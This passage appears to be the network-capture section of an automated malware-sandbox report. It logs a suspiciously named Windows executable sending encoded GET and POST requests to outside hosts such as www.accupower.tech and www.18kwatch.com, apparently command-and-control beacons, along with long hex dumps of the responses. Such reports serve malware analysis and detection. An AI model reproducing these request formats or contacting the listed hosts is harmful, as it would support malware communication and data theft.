                                                                                      Data Ascii: 9jtPKX=3bdQCQDRazJtbn8BaPiSP9DdouFiwmgPuHZiaQXUQBiTXQyS0AxTZGmw0wwUzzwI7I/kuq6A3CDp3QDxLZi1GQf6J09Lx9LsKznpOhNNl+HTyGHI3F3iCArW5CWvhihbFYT+eSmwFhdqpIYtKJSlRfUuvSr87MIKOeOj11FwQZYT8qGSE+98Mv/+OmGiz4nO5JfvgAbVHnhWOi/XSOiJT6aWSmzrbUtwLLLr5HwI/gnJWg3obwS7kdA3r7vDbMd6ejVDbwAAc7bJGjvV7zZ8Ku+lelF5bmXM0sIrpNiUSZwvrbMISa5wuTU8q7pXsBO4erdNDseuAcRrp4G4u2b48RkEvw0F02+0j9ge1FRl7JiPYt7BRlzfSaXTkm43fv7pOP6LExiPiPuN7D9kZ2DPRfmqFC9K1wtW181GWq4rHEwWdF9FCx3VXX/CCzLtzU1yf0EOFHBL48AqKzkpvPRZJA8hs4pz+gch0Wi2yxW8XwAZrGtfgikuBhEv+ns+c0bItGd3SdXaIWul41dUpOmBv6dyEHM5cxiWlYRpnUZTD9jPE34t80wn9mMyHmeH5+PGw7QSpGA3Yh9pvME/eimDGcyUo7A/lNwujfhkhfSHyT2DpBL6Jl6D3srHbMLI0Gs0MwhC+QDqLP4mund6F0lI6KBxaj4EFUezkKYkTfRrw4Rkr3WHE52GsLWwAheubFTTO5s9fIfgcYMA+8p2tGW0ylIntq6KaPeypKhPZGzfAMrwFQ1IKWfE66zpFGpyrjDQF/EqMuIh8sEa/aJcFUpo94KUZ8olZkcA9wnJO2/7PQ3norCfFvM78cTG7FZK9xSp4FLFushsnFTkL0g9++4iSu97Cot303blpxMculwXAb9vcwSMAM2f6tE4I8ikrfIZg7NTRvZ2UQ6v8zwyheIF8RNzQ+khvZ1dHs4Yq3CVKrwy+1GUo4fTY8vXWAZFzwipVfR/eerdrasD+UKcPmYOyJqkPlPDGUnQPhvpwNNPxGvUF [TRUNCATED]
                                                                                      Sep 30, 2024 10:43:44.550617933 CEST426INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:43:44 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 262
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 38 6b 77 61 74 63 68 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.18kwatch.com Port 80</address></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      24192.168.2.658799202.87.223.248802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:43:46.204901934 CEST504OUTGET /huyu/?9jtPKX=6Z1wBk7RYwBPGlswbf+1K+rZouoL6hxCsE01bzPZVmnRPi6w4QFoc0Kr9wwe5SYV2Krnjruyq1yW2kXKM8ywVSDOHER5s93YVzLABz8XusiexAKM+GOGLDXayUXcrjkYWYPbXVo=&YDT4P=4xd8DzO HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.18kwatch.com
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Sep 30, 2024 10:43:47.099808931 CEST426INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:43:46 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 262
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 38 6b 77 61 74 63 68 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.18kwatch.com Port 80</address></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      25192.168.2.658800217.160.0.158802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:43:52.182126045 CEST769OUTPOST /ojw7/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.accupower.tech
                                                                                      Origin: http://www.accupower.tech
                                                                                      Referer: http://www.accupower.tech/ojw7/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 44 63 42 61 6c 34 64 5a 65 4c 69 68 63 54 37 6b 72 35 39 46 50 52 67 49 35 38 77 30 6c 6c 61 77 2b 4b 47 77 32 6b 48 35 34 61 59 46 6c 43 2f 4a 6b 75 52 69 4e 46 61 48 44 59 78 64 59 6f 5a 66 4e 70 30 49 43 75 53 33 75 47 36 49 71 2f 69 31 44 4e 4f 77 75 51 62 5a 33 34 5a 54 47 54 46 51 56 59 7a 61 2b 35 33 39 74 56 76 69 49 64 67 62 54 44 71 4d 2f 7a 46 34 52 6d 77 37 78 52 6f 63 48 58 56 67 51 74 6f 44 69 52 7a 72 50 2b 7a 33 37 42 47 39 74 49 61 57 42 34 4a 58 63 75 63 43 35 4c 47 55 4f 6e 6f 79 6d 38 47 53 51 64 54 63 73 67 56 74 57 32 49 79 47 4b 4d 6a 51 39 5a 7a 76 30 58 4b 31 4c 2f 68 6c 42 55 33
                                                                                      Data Ascii: 9jtPKX=DcBal4dZeLihcT7kr59FPRgI58w0llaw+KGw2kH54aYFlC/JkuRiNFaHDYxdYoZfNp0ICuS3uG6Iq/i1DNOwuQbZ34ZTGTFQVYza+539tVviIdgbTDqM/zF4Rmw7xRocHXVgQtoDiRzrP+z37BG9tIaWB4JXcucC5LGUOnoym8GSQdTcsgVtW2IyGKMjQ9Zzv0XK1L/hlBU3
                                                                                      Sep 30, 2024 10:43:52.818250895 CEST1236INHTTP/1.1 200 OK
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Date: Mon, 30 Sep 2024 08:43:52 GMT
                                                                                      Server: Apache
                                                                                      Content-Encoding: gzip
                                                                                      Data Raw: 33 30 30 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bc e9 b2 db 48 92 2e f8 ff 3e 85 6e 95 dd a9 ee 42 2a b1 6f d2 ad 6b 03 12 24 40 12 1b 41 10 5b 5b db 18 f6 7d df 91 a6 77 9f e0 d1 92 52 65 56 57 4d f7 f4 bf 3a d2 91 48 20 e0 b1 79 78 84 7f fe 39 fe 77 3a 56 e5 ff f9 1f ef c0 cf ff 4e 23 2f fc fc f1 ed eb 98 8d 65 f4 7f bc 20 98 da 66 89 fa 9f c7 28 48 df bd 7f 57 46 d9 30 4e 75 32 c4 ff d7 1f 31 8c f9 98 66 49 f4 ee e0 8d 63 d4 67 d1 b0 0d 63 54 45 a0 58 56 c7 cd ff fd e3 c3 ff 1b fe 2c f2 ad b6 b7 2a aa 68 f4 de a5 e3 d8 be 8f ba 29 9b ff f2 87 63 53 8f 51 3d be 37 b6 36 fa c3 bb e0 f3 b7 bf fc 61 8c d6 11 7e b5 f4 e3 bb 20 f5 fa 21 1a ff 32 8d f1 7b e6 0f f0 77 ed 1d c6 0d b4 f7 9b f0 57 05 f0 9f ff e7 bb ba e9 2b af cc f6 e8 e7 60 18 de 61 08 8a bd 47 c0 5f da 40 b1 0f 38 fd ee 69 1c 41 6b 5f 6d f8 00 c3 49 36 a6 93 ff 73 d0 54 70 1d 05 4d e9 0d f0 8f 8f ff 19 f6 fa 31 0b ca e8 27 6f c8 c2 e8 a7 10 74 20 2b 87 9f e2 2c 09 bc 76 cc 9a fa f5 71 ea a3 9f e2 a6 01 23 f2 d3 6b 4c 5f ff 25 7d 33 b5 [TRUNCATED]
                                                                                      Data Ascii: 300aH.>nB*ok$@A[[}wReVWM:H yx9w:VN#/e f(HWF0Nu21fIcgcTEXV,*h)cSQ=76a~ !2{wW+`aG_@8iAk_mI6sTpM1'ot +,vq#kL_%}3?o~%~'ogoiU4durW?you3FoOfaG`>>_"i%'G0YN#tKGbhOo0*IV@>y&_i|f{i3>x`8[!S~,>~3EG;p>3]\*\wwH +K7A}_W)f"A__Gi\'-Q)OoM@Rk|FBO`_|/(^ZG?X4xUYZ/)]-[)aT*eI1z&_zzV}?O|<b|h}&0pL?:m?Q#Q`/={`%]_y)K8Wi*@S~{y^fuzo [TRUNCATED]
                                                                                      Sep 30, 2024 10:43:52.818305969 CEST224INData Raw: 7f 79 ad cd b8 6c 96 0f 9f 6d cd a7 cf 46 f1 5b ab 3f 81 59 a8 be fb 96 45 65 08 8c fa d7 da 5e da 3d 34 65 16 be fb 63 80 bc fe 7c fc 6a 13 de 61 ed fa f1 6b f7 7e c6 c1 38 bd fb 99 7a 0d d7 bb 9f 5f 2b e8 53 19 25 51 1d 7e 95 03 26 e4 eb 48 fc
                                                                                      Data Ascii: ylmF[?YEe^=4ec|jak~8z_+S%Q~&H3m?{,o~5_j+`v:DE}>6}/?Oo>#WUK0Xm6e{u&<!J}*;bo*O
                                                                                      Sep 30, 2024 10:43:52.818344116 CEST1236INData Raw: df b7 29 48 a3 a0 f0 9b f5 af 9a d5 7b 60 53 03 ad 02 77 5e db c8 4b 35 bf 99 b3 5f a7 13 f9 f8 e7 2f 23 81 e2 60 96 ff bc 64 e1 98 7e 78 7d fe a1 8e 01 f4 20 48 81 b4 af bb d3 77 9d 7a ed 2f f1 4b 99 80 ba 36 3b 30 96 df ea fb b2 bc 5f 97 be 8d
                                                                                      Data Ascii: )H{`Sw^K5_/#`d~x} Hwz/K6;0_>|mV[?6<|y2~GovmSo{"X5G?}zM7_+/0IXkO?^;_~:}D%oWo%~]
                                                                                      Sep 30, 2024 10:43:52.818377018 CEST1236INData Raw: 39 8b 07 2d 4f 96 61 47 8c db 33 d8 c9 cb 35 15 a4 80 6c 58 11 96 02 09 86 97 10 d9 a4 d3 c3 ba 91 d6 b1 79 12 e8 e9 11 38 e4 09 9c 15 77 a0 14 59 f6 bc 3d 6e c1 b3 44 66 b6 20 46 66 80 16 19 c2 f7 27 37 08 0d c4 d9 93 2e 79 69 e8 2c 1a f6 d8 82
                                                                                      Data Ascii: 9-OaG35lXy8wY=nDf Ff'7.yi,%1h7.!ag\G-Gp8Ri`Xp6q~8lx(^Y&>*A.pmzwq<D/YV&y$v%8__
                                                                                      Sep 30, 2024 10:43:52.818432093 CEST1236INData Raw: 49 b1 64 30 ca 5c 97 d0 19 47 14 f8 02 b3 05 8c f7 30 72 3f d6 c9 f1 79 70 17 f5 9a 3c 85 83 b5 48 34 24 b6 cc c5 87 54 6d ef 7d 37 f6 36 2c 42 0f f9 ed 48 de 75 f3 90 13 b7 31 99 ec 43 ff 38 37 9b ba dd fb 87 88 93 64 ae 16 01 d9 f2 c0 18 c4 53
                                                                                      Data Ascii: Id0\G0r?yp<H4$Tm}76,BHu1C87dSn!\ -8!_KLHrGJ'kGuiJOgrZF,NXRIaaUh).'8JeP[3.^s]wk|1Ru}k}`]vR[JLt=
                                                                                      Sep 30, 2024 10:43:52.818464041 CEST1236INData Raw: 01 4e 18 7c 1c 9c 43 b1 b5 da ec e1 8a 22 06 8f 37 f9 79 bd 2d 97 6d 1f 06 e5 e4 97 9b 2e 0c c8 80 56 a8 08 9d ab 4b 11 5e 71 52 10 d1 5e 47 7a d3 85 4b e8 ae ef 5a 26 d3 f4 b3 b7 9d fc 96 5b 17 f9 66 21 74 d8 a5 cf 65 18 1c 44 f2 e0 fe d0 92 57
                                                                                      Data Ascii: N|C"7y-m.VK^qR^GzKZ&[f!teDW+lz|u<R`Fo"idQVwUm{2: #3gvB,CS!Ok=bYwj&YELY_P@X8`%>RUW> dp|uF=!jFJR
                                                                                      Sep 30, 2024 10:43:52.818497896 CEST1236INData Raw: 6a 51 ac e0 e7 99 3d 4d e0 f0 4c ba 28 23 6a 98 13 d1 2e 75 10 50 ac af 7a ba ac ad 32 64 6d 1d 03 98 63 1b 47 31 7e a5 fb 7c 76 6a 8a b1 04 ad c4 63 9b de 2c 01 76 b1 5d 50 fc 39 18 1b df 8c 12 91 9e 18 ed cc 42 77 f3 f9 3a 93 73 b9 56 0f 00 e0
                                                                                      Data Ascii: jQ=ML(#j.uPz2dmcG1~|vjc,v]P9Bw:sVh@{`j<G:9HLJ1"<lt7jO`,r4(J*{8GuO_ W`leU 5(V\+zK{hWd56&
                                                                                      Sep 30, 2024 10:43:52.818547964 CEST1236INData Raw: a3 c7 d0 39 b1 23 7d 88 92 47 74 b2 64 b8 3e 0a 62 c7 87 13 9a 45 c2 04 7b 48 dc e5 a3 31 1b ea e5 39 df e0 a3 1f 42 f5 89 6d 68 38 6e b1 5e 93 22 8e d1 57 6a 3a 2e 78 89 99 86 b5 51 9a 22 d3 64 76 e5 62 2d be c5 6d 17 73 ac 6b 98 cc 86 68 0e 7a
                                                                                      Data Ascii: 9#}Gtd>bE{H19Bmh8n^"Wj:.xQ"dvb-mskhzej${ytN:,3&9d(r?wpAp&B%%D$FSO;[]p~T0Mbh1{[)FOP3zL#;u'aX2x/XX3MljhA$
                                                                                      Sep 30, 2024 10:43:52.818582058 CEST776INData Raw: 71 6b b5 8c 05 af f0 a5 26 19 ab 02 b1 1f 2b 3f 40 e4 d6 ae 89 14 f6 09 85 b9 9a 79 9e cb f3 40 a2 ee 9d 77 9e 6d 5d 0d 10 bb 86 33 7c 53 f2 c1 71 64 b4 cd 18 19 24 21 a9 2e 15 d4 a7 ad 7e d2 d6 a1 07 ce 08 e4 82 20 c2 8c cb e7 9d 68 47 e2 84 dd
                                                                                      Data Ascii: qk&+?@y@wm]3|Sqd$!.~ hGZuJyC -kIR'gr#7XXBN"l8xz2y16^y3\ v\gBr*G#PZdj(R[.|xJk:B<"
                                                                                      Sep 30, 2024 10:43:52.818619967 CEST1236INData Raw: 80 ae 43 4a 07 04 f0 55 c0 53 b2 fc d0 51 dd ca 5e 46 f7 0c 9b 2a 40 60 13 90 99 07 e2 36 80 e9 a9 3d 46 11 d1 55 54 5e 27 eb c9 c4 71 51 ab 1d 3c f2 2a 58 31 26 0e eb 10 47 53 28 3e d7 15 ed 69 e4 7c f2 25 2a b5 8c 7d 00 11 94 59 a7 6c 94 ec f8
                                                                                      Data Ascii: CJUSQ^F*@`6=FUT^'qQ<*X1&GS(>i|%*}YliLhHN1c=+@4y@-D,u+) xJHHJ&[hK[g2~X^+cAj.}EKM$`<yvV!q
                                                                                      Sep 30, 2024 10:43:52.823740959 CEST1236INData Raw: 0e f8 6d a7 36 26 77 66 48 3c 93 c5 5e c0 c9 29 1c 61 ea 74 0e e1 fb 1d 3e 40 d0 b4 ea 75 3c 3f ea 9d 40 b0 3c 92 aa 6d c2 86 1d e4 15 d7 87 b6 f6 ac eb 79 5d 0d 96 39 d2 c7 0e b9 4e 58 7d 00 7c 84 60 f1 68 14 dd dd 6a cf fd 25 63 ca 8e 14 87 73
                                                                                      Data Ascii: m6&wfH<^)at>@u<?@<my]9NX}|`hj%csM9Q nOG5=$< s'g=`g9KG=HaRDFh7Kgn@ohl2~ehS=H{be:3?3w0OmsWX G,P!


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      26192.168.2.658801217.160.0.158802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:43:54.864149094 CEST793OUTPOST /ojw7/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.accupower.tech
                                                                                      Origin: http://www.accupower.tech
                                                                                      Referer: http://www.accupower.tech/ojw7/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 44 63 42 61 6c 34 64 5a 65 4c 69 68 64 7a 72 6b 6e 34 39 46 59 42 67 48 32 63 77 30 73 46 61 30 2b 4b 61 77 32 68 6e 50 34 4d 67 46 6c 67 33 4a 32 62 78 69 4b 46 61 48 62 49 78 63 53 49 5a 55 4e 70 49 41 43 72 71 33 75 47 2b 49 71 37 6d 31 44 38 4f 76 76 41 62 48 38 59 5a 52 46 6a 46 51 56 59 7a 61 2b 34 54 62 74 52 44 69 49 6f 6f 62 54 68 43 50 35 44 46 37 59 47 77 37 36 78 6f 51 48 58 56 57 51 76 4e 4c 69 55 33 72 50 37 66 33 37 51 47 79 32 34 62 38 4c 59 49 51 58 38 35 38 32 61 50 57 41 32 30 68 6d 38 75 77 63 4c 53 47 77 54 56 4f 45 6d 6f 77 47 49 55 52 51 64 5a 5a 74 30 76 4b 6e 63 7a 47 71 31 78 55 6d 4d 4c 4c 55 56 69 2f 39 54 52 57 37 33 69 2b 32 77 45 6a 4e 51 3d 3d
                                                                                      Data Ascii: 9jtPKX=DcBal4dZeLihdzrkn49FYBgH2cw0sFa0+Kaw2hnP4MgFlg3J2bxiKFaHbIxcSIZUNpIACrq3uG+Iq7m1D8OvvAbH8YZRFjFQVYza+4TbtRDiIoobThCP5DF7YGw76xoQHXVWQvNLiU3rP7f37QGy24b8LYIQX8582aPWA20hm8uwcLSGwTVOEmowGIURQdZZt0vKnczGq1xUmMLLUVi/9TRW73i+2wEjNQ==
                                                                                      Sep 30, 2024 10:43:55.482134104 CEST1236INHTTP/1.1 200 OK
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Date: Mon, 30 Sep 2024 08:43:55 GMT
                                                                                      Server: Apache
                                                                                      Content-Encoding: gzip
                                                                                      Data Raw: 33 30 30 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bc e9 b2 db 48 92 2e f8 ff 3e 85 6e 95 dd a9 ee 42 2a b1 6f d2 ad 6b 03 12 24 40 12 1b 41 10 5b 5b db 18 f6 7d df 91 a6 77 9f e0 d1 92 52 65 56 57 4d f7 f4 bf 3a d2 91 48 20 e0 b1 79 78 84 7f fe 39 fe 77 3a 56 e5 ff f9 1f ef c0 cf ff 4e 23 2f fc fc f1 ed eb 98 8d 65 f4 7f bc 20 98 da 66 89 fa 9f c7 28 48 df bd 7f 57 46 d9 30 4e 75 32 c4 ff d7 1f 31 8c f9 98 66 49 f4 ee e0 8d 63 d4 67 d1 b0 0d 63 54 45 a0 58 56 c7 cd ff fd e3 c3 ff 1b fe 2c f2 ad b6 b7 2a aa 68 f4 de a5 e3 d8 be 8f ba 29 9b ff f2 87 63 53 8f 51 3d be 37 b6 36 fa c3 bb e0 f3 b7 bf fc 61 8c d6 11 7e b5 f4 e3 bb 20 f5 fa 21 1a ff 32 8d f1 7b e6 0f f0 77 ed 1d c6 0d b4 f7 9b f0 57 05 f0 9f ff e7 bb ba e9 2b af cc f6 e8 e7 60 18 de 61 08 8a bd 47 c0 5f da 40 b1 0f 38 fd ee 69 1c 41 6b 5f 6d f8 00 c3 49 36 a6 93 ff 73 d0 54 70 1d 05 4d e9 0d f0 8f 8f ff 19 f6 fa 31 0b ca e8 27 6f c8 c2 e8 a7 10 74 20 2b 87 9f e2 2c 09 bc 76 cc 9a fa f5 71 ea a3 9f e2 a6 01 23 f2 d3 6b 4c 5f ff 25 7d 33 b5 [TRUNCATED]
                                                                                      Data Ascii: 300aH.>nB*ok$@A[[}wReVWM:H yx9w:VN#/e f(HWF0Nu21fIcgcTEXV,*h)cSQ=76a~ !2{wW+`aG_@8iAk_mI6sTpM1'ot +,vq#kL_%}3?o~%~'ogoiU4durW?you3FoOfaG`>>_"i%'G0YN#tKGbhOo0*IV@>y&_i|f{i3>x`8[!S~,>~3EG;p>3]\*\wwH +K7A}_W)f"A__Gi\'-Q)OoM@Rk|FBO`_|/(^ZG?X4xUYZ/)]-[)aT*eI1z&_zzV}?O|<b|h}&0pL?:m?Q#Q`/={`%]_y)K8Wi*@S~{y^fuzo [TRUNCATED]
                                                                                      Sep 30, 2024 10:43:55.482217073 CEST1236INData Raw: 7f 79 ad cd b8 6c 96 0f 9f 6d cd a7 cf 46 f1 5b ab 3f 81 59 a8 be fb 96 45 65 08 8c fa d7 da 5e da 3d 34 65 16 be fb 63 80 bc fe 7c fc 6a 13 de 61 ed fa f1 6b f7 7e c6 c1 38 bd fb 99 7a 0d d7 bb 9f 5f 2b e8 53 19 25 51 1d 7e 95 03 26 e4 eb 48 fc
                                                                                      Data Ascii: ylmF[?YEe^=4ec|jak~8z_+S%Q~&H3m?{,o~5_j+`v:DE}>6}/?Oo>#WUK0Xm6e{u&<!J}*;bo*O)H{`Sw
                                                                                      Sep 30, 2024 10:43:55.482253075 CEST1236INData Raw: ee a0 57 0f e6 4e 72 4a 32 72 fc e1 6a 62 ee 85 93 8e 38 27 f3 ea 89 9b 36 8e 4b 64 70 5d cf 2e cf 96 e3 74 1a d4 77 b9 6c 0a c1 5d 1e 2e 78 56 60 ca 80 61 1e d3 74 52 83 8e e3 0e 44 e5 5f 98 e9 71 27 75 e7 ec 1f 8f e8 7a 40 43 5b 4a 89 66 2f 0a
                                                                                      Data Ascii: WNrJ2rjb8'6Kdp].twl].xV`atRD_q'uz@C[Jf/1~MrvP88aQ?b4Ho4>xzFQ#GwNN$#/]zrZ{&,H0Jv.H%d0gk1JHtv69-OaG35l
                                                                                      Sep 30, 2024 10:43:55.482285023 CEST672INData Raw: 43 4a b4 9f c6 89 0a f4 96 2e d5 02 a1 fa 7a 74 eb 85 e6 d7 71 a8 b0 ce 0f dc 41 b5 9d c3 38 4d 63 85 61 b1 75 ae 9d 34 ac 47 c6 9a 16 88 32 66 57 61 a7 1a 53 60 03 11 79 27 76 f9 6e 08 ad 14 85 02 5a df ce 7c 6b a9 23 e5 ed ed 3e 69 38 7e 66 af
                                                                                      Data Ascii: CJ.ztqA8Mcau4G2fWaS`y'vnZ|k#>i8~f~+aZ>t#HXm.AH:9ofvt+Zk0l&jfA,CYN'HB,q/.m%lXx)0bsr!"s)LXV#Id0\G0r
                                                                                      Sep 30, 2024 10:43:55.482316971 CEST1236INData Raw: 19 b3 49 83 8b 79 29 10 e1 bc f5 90 8b 5f 1f 48 e7 cd a7 c9 32 34 77 bc 56 54 e4 83 c3 0f e9 f3 ad d7 95 90 67 f3 15 a1 60 61 87 f0 21 6b 8d 2a 8e b2 85 ed 4b 64 ac dc 94 89 4e 68 17 ec b5 2a ac 49 19 e3 7a f1 75 1f 10 5a 43 1f 85 a9 e9 4f a8 bc
                                                                                      Data Ascii: Iy)_H24wVTg`a!k*KdNh*IzuZCOc(%@t: bA_q49TP7xBku(MCUuP~:LNO!n$@duA7tDde1Bk|v4yrfgtvyrAsI>fY
                                                                                      Sep 30, 2024 10:43:55.482371092 CEST1236INData Raw: 98 ec 22 26 14 28 b3 84 c2 c0 5e 8a 73 e1 63 d7 f2 72 4e 95 e7 f1 c0 fb 38 f8 cc 3f 27 e5 81 e6 32 7f 59 2f 7c 40 4a f9 09 55 8c 00 97 b3 25 91 73 6e 55 8e cc 22 3f 98 55 de 90 55 35 1a 44 e1 9b 45 3e 72 c9 e5 eb 6f 4e 24 9a 78 2d dc bc 7d e8 27
                                                                                      Data Ascii: "&(^scrN8?'2Y/|@JU%snU"?UU5DE>roN$x-}'[{JE}Q3f`*vs7*Hi6il=H?*JT%C9asrw]u91%<M#gcN:{y|3KydfA,k?\a/U"G
                                                                                      Sep 30, 2024 10:43:55.482405901 CEST1236INData Raw: a1 19 1f 14 11 ab 49 87 2e db 23 34 36 c7 79 8e e1 1d 3f 30 b5 50 55 28 03 10 e9 65 e0 16 e3 e4 ce 83 13 78 1d cd 6d 4b 8d 56 89 09 03 97 84 dc 2f 2a 5d 3b fd ed ee a2 a4 ac d4 dc 5e 17 47 b5 80 73 62 6d 22 80 c1 6c e3 55 b9 33 8c 70 6c 2c 83 d1
                                                                                      Data Ascii: I.#46y?0PU(exmKV/*];^Gsbm"lU3pl,ghcp-n!>Dq[~,O^QwdZ.|Bt*ENMxutb<*Y[<$L,z?q;@2GPHFmJ^qfZWV-S^
                                                                                      Sep 30, 2024 10:43:55.482439041 CEST1236INData Raw: e1 aa 83 35 db 17 d7 24 49 fe f2 1f 3a af f8 3f 9d d7 7f 3a af ff 74 5e ff b3 ce eb 05 d1 f3 c3 19 44 23 f9 97 b3 79 cf df 9c d7 a3 c2 5f f9 7b 61 9e e5 e2 75 ff 84 de 8d e7 f2 8f 39 af df e4 01 97 fa ef c8 fb 2f 3a af f7 5c 17 e4 93 c9 cb c8 09
                                                                                      Data Ascii: 5$I:?:t^D#y_{au9/:\8gr,a$_]6e9*xs^+Y2C`L)UGL ''H;R>XFGip`qp"|4g{ke_cvXe=j$>{@mHvr1B
                                                                                      Sep 30, 2024 10:43:55.482470989 CEST1236INData Raw: 0a b4 aa 8f 4b e7 81 c0 95 35 6e 54 47 af 5e 49 39 71 49 e7 35 dc 73 6c 8d 4d 8f 42 09 85 86 18 dd 91 1f 63 e8 01 8b 65 8c 9c fa ab 0b 8f d5 ce 5d 35 ce 63 38 48 5f ef 7c 6d d4 68 ec 11 0e dc b2 22 0e 30 19 9e f2 35 31 0d 21 bd bc d8 57 d8 a9 d8
                                                                                      Data Ascii: K5nTG^I9qI5slMBce]5c8H_|mh"051!Wr1AYS#J?!ALMI&F<YqNs)liv.523S zMrc '`2'b(; z|D$q4q8iOK9n
                                                                                      Sep 30, 2024 10:43:55.482506990 CEST1236INData Raw: 17 35 f6 c0 0a c0 e6 9e f5 46 51 78 50 ae 24 1f 7b a9 84 c9 23 c5 da 80 c8 d9 e4 8e 04 49 8a 7e 71 7b 78 9a 2f a2 d5 31 c5 68 0f 18 e9 ac 50 72 8f d3 81 34 66 0c c9 8f a7 79 ea 44 7e 27 48 6d e2 41 28 cd e9 06 9c 7f 82 48 30 dc 26 67 d1 6e 18 6f
